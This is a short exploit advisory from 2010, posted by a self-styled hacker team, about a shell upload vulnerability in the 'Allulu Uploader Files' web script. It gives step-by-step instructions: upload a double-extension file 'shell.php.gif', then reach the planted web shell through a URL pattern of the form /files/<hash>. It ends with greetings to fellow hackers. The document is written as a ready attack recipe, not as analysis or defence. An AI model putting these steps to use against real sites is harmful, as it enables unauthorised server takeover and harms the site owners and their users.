Allulu Uploader Files suffers from a shell upload vulnerability.
2af05b348daf862a290c01a7183cd68b2932bb5b335af8c976c5073135abf7a5
# Exploit Title: Allulu Uploader Files Remote Shell Upload Vulnerability
# Date: 27/06/2010
# Author: ViRuS Qalaa
# Email: h1g@hotmail.it
# My Sites : www.pal-mafia.com & www.vbspiders.com
# Script url: http://www.allulu.org/vb/showthread.php?t=1395
# Tested on: Windows
# Team hacker:ViRuS Qalaa-HaCkEr aRaR-ViRuS KSA>>>X-MaN HaCk3r Team
:::::::::::::::::::::::::
=================Exploit=================
DorK:In your Dreams
First Lift your shell.php.gif on the Script Allulu Uploader Files
After that I will show you a download link take him only the name the file
after uploaded to the site and the name is uncannily like
(9efec112951ca961ebe3565a8685fca7)
----exploit----
http://{localhost}/{path}/files/9efec112951ca961ebe3565a8685fca7<http://%7blocalhost%7d/%7Bpath%7D/files/9efec112951ca961ebe3565a8685fca7>
9efec112951ca961ebe3565a8685fca7>>>Named after shell uploaded on the site
---------greatz----------
Greatz to :
hacker arar,ViRuS KSA,Q2
and My friends Others and My friends in MSN
EnJoY o_O